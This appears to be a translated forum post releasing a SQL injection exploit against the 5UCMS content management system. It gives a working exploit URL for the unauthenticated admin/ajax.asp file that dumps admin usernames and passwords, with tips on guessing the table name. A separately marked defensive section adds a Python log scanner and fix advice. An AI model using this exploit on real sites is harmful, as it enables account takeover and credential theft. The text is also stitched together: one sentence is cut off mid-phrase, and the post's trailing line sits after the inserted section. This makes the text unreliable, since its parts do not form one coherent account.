I once accidentally found a small vulnerability in 5UCMS. The vulnerable file is
admin directory/ajax.asp
Because it does not verify that the user is logged in to the admin back end, the file can be accessed without logging in, and the file contains a SQL injection.
Today I went to the official site to see whether they had issued a fix bulletin for the vulnerability. Here I am releasing the exploit, which directly dumps the back-end account and password.
http://127.0.0.1/admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from xxxx_Admin&id=1%20and%201=2%20UNION%20select%201%20from xxxx_Admin
The table name xxxx_Admin is generally customized at installation time and is usually based on the domain name; for example, for a site such as www.xxx.com
the table name is probably qing_admin. Modify it yourselves. There is no real technical content here; novices generally cannot dump it, so the only issue to
Honestly, their program is still relatively secure; being able to get even one out is pretty good, for rookies like us.
If it shows: True|False|ERR: Object required, that proves the table name was filled in wrong.
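For defenders, requests like the one above stand out in web server logs, because cid and id should only ever carry integers. The following is an added example, not part of the original post or of 5UCMS: it scans access-log lines for requests to admin/ajax.asp whose cid or id is not a plain integer. The "method uri status" log layout and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in a simplified "method uri status" layout
# (an assumption, not a real 5UCMS or IIS log).
SAMPLE_LOG = """\
GET /admin/ajax.asp?Act=modeext&cid=1&id=1 200
GET /admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%201%20from%20xxxx_Admin&id=1 200
GET /index.asp?id=7 200
GET /admin/AJAX.ASP?act=modeext&cid=3&id=2%27 500
"""

TARGET = "/admin/ajax.asp"        # endpoint named in the post
NUMERIC_PARAMS = {"cid", "id"}    # parameters the post injects into
SQL_TOKENS = re.compile(r"\b(union|select|from|and|or|chr)\b", re.I)

def inspect_line(line):
    """Return a finding dict if the request carries a non-integer cid/id, else None."""
    parts = line.split()
    if len(parts) < 3:
        return None
    url = urlsplit(parts[1])
    if url.path.lower() != TARGET:  # IIS paths are case-insensitive
        return None
    bad = {}
    # parse_qs URL-decodes values, so %20 and %27 are seen as space and quote
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if name.lower() in NUMERIC_PARAMS:
            for v in values:
                if not re.fullmatch(r"\d{1,10}", v):
                    bad[name.lower()] = v
    if not bad:
        return None
    tokens = sorted({t.lower() for v in bad.values() for t in SQL_TOKENS.findall(v)})
    return {"status": parts[2], "params": bad, "sql_tokens": tokens}

def scan(log_text):
    """Scan every line and return findings annotated with the 1-based line number."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        hit = inspect_line(line)
        if hit:
            hit["line"] = n
            findings.append(hit)
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

The same integer-only rule is what the server-side fix needs: reject any cid or id that is not numeric before it reaches the query, and require an authenticated admin session for the file.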
After success, it looks as follows: